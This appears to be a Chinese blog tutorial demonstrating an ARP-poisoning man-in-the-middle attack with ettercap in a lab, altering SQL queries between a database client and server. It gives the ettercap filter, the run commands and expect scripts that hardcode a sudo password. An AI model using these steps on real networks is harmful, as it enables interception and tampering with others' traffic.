利用ettercap进行简单的基于数据库的ARP毒化攻击

最新推荐文章于 2023-12-07 17:49:41 发布
最新推荐文章于 2023-12-07 17:49:41 发布
阅读量418 收藏
点赞数
分类专栏: 中间人攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shimadear/article/details/94041046
版权

情景:

两台主机A(IP:192.168.44.132)和B(IP:192.168.44.134)

分别作为数据库服务器和客户端。

另一主机C作为中间人进行ARP攻击。主机C上已安装ettercap并启用ip转发。

攻击内容:

在客户端和服务器建立连接后,截获客户端发给服务器的SQL语句,并修改其中字段,重新转发给服务端。然后看服务端是否能返回被修改过后的语句执行结果。

过滤文件:

过滤文件changeStr.txt内容,就是简单的将"TEST2"字段替换为"TEST1"。

if (ip.proto==TCP) 
{
    replace("TEST2","TEST1");
}

编译过滤文件:

过滤文件需要先进行编译。编译语法实例:sudo etterfilter changeStr.txt -o changeStr.filter

这里我写了一个脚本来执行。

用于编译的脚本compile.sh的内容:

(注意:执行这个脚本需要先安装expect

安装过程我在这篇博文里面有记录:https://blog.csdn.net/shimadear/article/details/93972559

#!/usr/local/bin/expect -f
#set timeout 20 #设置超时时间
spawn sudo etterfilter changeStr.txt -o changeStr.filter
expect {
"*密码" {send "123456\r"}
"*password" {send "123456\r"}
}
interact

 这里面"123456"表示root用户密码,按情况改写。

运行:

运行过程包括ettercap的启动,过滤文件的加载,运行后被攻击的两台主机发送的数据包就都按过滤文件的内容进行替换。

运行语句实例:sudo ettercap -T -q -M arp:remote /192.168.56.102// /192.168.56.105// -F changeStr.filter

同样也写了脚本来执行。run.sh内容:

#!/usr/local/bin/expect -f
#set timeout 20 #设置超时时间
spawn sudo ettercap -T -q -M arp:remote /192.168.44.134// /192.168.44.132// -F changeStr.filter
expect {
"*密码" {send "123456\r"}
"*password" {send "123456\r"}
}
interact

查看结果:

在连接到的数据库实例中有表TEST1和表TEST2,TEST1记录条数为1条,TEST2记录条数为2条。

在客户端与服务器建立连接之后,中间人进行攻击之前,客户端提交SQL语句"SELECT COUNT(*) FROM TEST2;" ,正常返回结果为2。而在中间人攻击之后,再次执行语句"SELECT COUNT(*) FROM TEST2;",可以看到返回结果为1,而这正是表TEST1的记录条数。说明攻击成功。

 

朱又炖粉条
关注
专栏目录
ettercap ARP攻击
weixin_49071539的博客
01-13 728
1. 在/etc/sysctl.conf的配置文件中,修改变量net.ipv4.ip_forward的值为 1,把前面的 # 去掉;若此变量没有,那就添加, net.ipv4.ip_forward=1 2. 下载ettercap apt-get install ettercap 使用图像界面ettercap -G 3. ettercap -G 启动 sniffing at startup 开启 primary interface 选择wlan0 点击右上角√ 4. 开始ARP中间
Ettercap进行arp毒化
andiao1218的博客
03-18 369
攻击者IP:192.168.220.152 受害者IP:192.168.220.151 网关:192.168.220.2 修改DNS文件 ┌─[root@sch01ar]─[~] └──╼ #vim /etc/ettercap/etter.dns 在此处添加两条记录 “*”为所有域名,后面的IP地址为攻击者的IP地址 这样受害者所打开的网页都会变成打开攻...
使用ettercap进行ARP欺骗攻击实验(保姆级教程)
最新发布
m0_74806866的博客
12-07 1万+
本文对ettercap的使用,和靶场试验实践进行了演示,可以帮助大家更好的学习和了解ARP欺骗和DNS攻击
密码分析:使用 Ettercap 和 它的 ARP 毒化功能来嗅探流量
weixin_33918357的博客
02-13 86
vim /etc/etterconf 将 ec_uid 和 ec_gid 改为 0 需要取消下面的 IPTABLES 行的注释。它在靠近文件末尾的 LINUX 一节 ettercap -G Shift + U Ctrl + S Ctrl + W 最后,我们开始进行 ARP 毒化。访问菜单栏的 Mitm | Arp poisoning ( ARP 毒化) 。 Sniff remote conne...
ettercap进行简单arp欺骗和中间人攻击
TH_NUM的博客
12-08 8345
请遵守法律法规,严守道德底线,禁止使用相关技术危害他人信息安全。 攻击主机平台:kali-linux 被攻击主机:笔记本电脑:192.168.1.103 (在同一局域网内) 1.利用ettercap进行arp欺骗:root权限下打开ettercapettercap -C (curses UI) ettercap -G (GTK+ GUI) cur
中间人攻击的实践与原理(ARP毒化、DNS欺骗)
hello_mumu的博客
02-25 2116
一、共享网络与交换网络的区别 1、共享网络 在共享网络中,由于HUB属于一层设备,对于到达本身的数据报文,HUB会对报文进行广播(除了收到报文的那个接口),因此接在同HUB的所有PC都能收到该报文。前提PC开启了混杂模式 注: 通常情况下,网卡都是工作在非混杂模式,也就是说即使收到数据报文,网卡会判断目的MAC是否和自己的一样,不一样的话代表数据包不是给自己的,因此...
利用Ettercap进行DNS欺骗攻击
顶峰
08-09 1162
2.1 DNS Query Flood攻击DNS Query Flood攻击本质上是一种UDP泛洪攻击,属于拒绝服务攻击的范畴。这是因为对当前网络层的攻击得到了很好的解决。DNS协议位于UDP协议之上,简单地说,协议越高,涉及的工作量越大,防御系统也越复杂。并且由于DNS服务器的不可替代性,一旦DNS服务器瘫痪,攻击通常很严重。因此,近期针对DNS服务器的DNSQueryFlood攻击频繁发生。2.2 DNS欺骗攻击
ARP攻击
weixin_45823267的博客
11-13 321
1.ARP缓存表 在每台安装有 TCP/IP协议的主机里都有一个ARP缓存表,用来记录与该主机处 在同一网络中的其它主机的IP地址与MA地址之间的对应关系 执行arp-a命令可以查看ARP缓存表。 缓存表中的记录默认是动态的,被设置了2分钟的自动老化时间 执行arp-d命令可以删除所有或者是指定的记录 2.主机A与同一网络中的主机B的通信过程 ①主机A检查自己的ARP缓存表中是否有与主机B的P地址...
第四章 ARP欺骗攻击与防御
OneZeRoXd的博客
11-08 1473
ARP协议(地址解析协议) ARP用于在以太网中获取某一IP地址对应的节点MAC地址 以广播的方式工作,解析范围只限于本地网络(即在同一网段中) ARP缓存表 在每台安装有TCP/IP的主机里都有一个ARP表,用来记录与该主机处在同一网络中的其它主机的IP地址与MAC地址之间的对应关系。 执行arp -a命令可以查看ARP缓存表。 缓存表中的记录默认是动态的,被设置了2分钟的自动老化时间。 执行a...
嗅探工具 --- wireshark、tcpdump、dsniff、ettercap、bettercap、netsniff-ng
墨鱼菜鸡
07-11 5095
最好的 MitM 中间人攻击开源框架清单:https://github.com/Chan9390/Awesome-MitM 哔哩哔哩:https://search.bilibili.com/all?keyword=wireshark 1、WireShark WireShark 是一个开源免费的高性能网络协议分析软件,它的前身就是非常著名的网络分析软...
基于区块链的命名数据网络内容毒化攻击抵御机制.pdf
08-15
#资源达人分享计划#
Ettercap进行ARP欺骗
afei001
03-08 5371
实验环境 攻击机:kali IP:192.168.3.144 靶机:win 7 IP:192.168.3.141 Ettercap进行ARP欺骗 1.进入ettercap的图形化界面 root@afei:~# ettercap -G #进入ettercap图形化界面 2.选择网卡 3.扫描局域网内的主机 4.查看扫描出的主机 5.选择目标主机,进行ARP欺骗...
kali内网攻击-ettercap
s0mor
09-10 639
ettercap是一款arp嗅探欺骗工具,通常用来进行中间人攻击 启动ettercap ettercap -G
[渗透测试笔记] 23.arp欺骗、ettercap
H4ppyD0g的博客
02-05 449
所有内容仅作为个人学习和实验使用,请勿用于非法用途,后果自负! 预备知识 网关(gateway) 是一个网络向另一个网络发送信息时必须经过的关口。 arp -a 查看缓存中的所有项目 kali下使用arp -a查看一下缓存,因为刚开机还没和其他机器通信过,所以只有网关的ip和mac arp欺骗原理 当主机A中的arp缓存足够多而把真正的网关ip清除出去后,主机A就会把hacker的ip当做...
ettercap+arp毒化嗅探+dns诈骗
一个喜欢哈士奇的中二少年
05-12 1264
测试环境:kali+win7 kali的ip信息如下: IP地址:192.168.1.138 MAC地址:00:0c:29:80:ed:5a win7的信息如下: IP地址192.168.1.228 MAC地址64:00:6A:1B:8D:CF 网关的信息如下: IP地址192.168.1.1 MAC地址14:75:90:6d:bf:ca
中间人攻击_Ettercap
分享学习网络的点点滴滴
09-22 908
统一的中间人攻击工具转发MAC与本机相同,但IP与本机不同的数据包支持SSH1\SSL中间人攻击
Ettercap 实施中间人攻击
CSDN
04-01 5506
中间人攻击(MITM)该攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式.
机器学习 ❀ 数据投毒攻击(数据投毒 / 模型投毒) 隐私攻击(数据隐私 / 模型隐私)
imomoe的博客
08-11 3571
人工智能 安全 模型投毒 数据投毒
最详细使用ettercap实现DNS劫持和arp欺骗教程
forever0heart的博客
04-25 8303
一、环境准备 1.kali linux虚拟机 2.ettercap 3.攻击机:192.168.40.128 4.钓鱼网站:192.168.40.128 5.目标机:192.168.40.129 二、修改配置文件 vim /etc/ettercap/etter.dns 三、配置钓鱼网站 打开apache 四、打开ettercap,发动攻击 1. 2. 3.网关添加到target1,目标机添加到target2(target里的内容也可以对换) 4.开始arp欺骗 5.开始DNS劫持
"北邮网安导论实践-ARP欺骗攻击实验及其分析
本次实验是关于ARP欺骗攻击的实践,旨在通过在Kali Linux上使用多种工具实现基于ARP欺骗的攻击手段,并对其进行分析。 实验环境搭建如下: 攻击机: Kali Linux - IP地址: 192.168.75.129 - MAC地址:00:0c:29:a0:0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值